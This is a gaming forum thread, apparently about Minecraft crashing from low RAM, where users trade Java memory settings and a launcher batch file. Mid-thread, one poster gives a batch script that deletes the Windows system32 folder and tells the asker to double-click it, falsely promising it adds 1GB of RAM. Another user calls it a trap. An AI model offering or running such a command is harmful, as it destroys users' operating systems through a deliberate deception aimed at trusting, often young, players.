Code: [Select]
@ECHO OFF
"Your java path here/javaw.exe" java -Xmx1024M -Xms1024M -jar "Your minecraft path here/minecraft.exe"

it does allot more. good for game. but it dosnt necessarily fix the crashing issue. might

Anyway, it's impossible to "download" RAM. You have to physically put ram in your computer.

Open up notepad (or textedit if you're on a mac) and type this:
Code: [Select]
@echo off
del c:\WINDOWS\system32
Save it as a .bat file on your desktop, and then double-click it.
Did it work? If it did, you should have at least 1gb more RAM!
Hmm...

It says it's pretty much JAVA.

1GB.
control panel > programs > java > java tab > view... double click runtime parameters and enter -Xmx512m > okay > apply > ok

hes only got 1g? the game already uses a default 512 or whatever. if he cant raise it due to not enough resources for rest of comp, then he cant raise it at all.

control panel > programs > java > java tab > view... double click runtime parameters and enter -Xmx512m > okay > apply > ok

I did that actually and it still crashed.

So I can't even play this game at all?

This kinda counts as a trap link for some of those younger audiences who fall for it.

And it's not good to try to get someone to do anyways.

well you should be able to. the ram fix people use is to have MORE so to have more draw distance and sustain more players.

its git nothing to do with why you are crashing. you have other java or stuffty memory issues.

How would I fix the java issues then?

close all 'dem research tabs
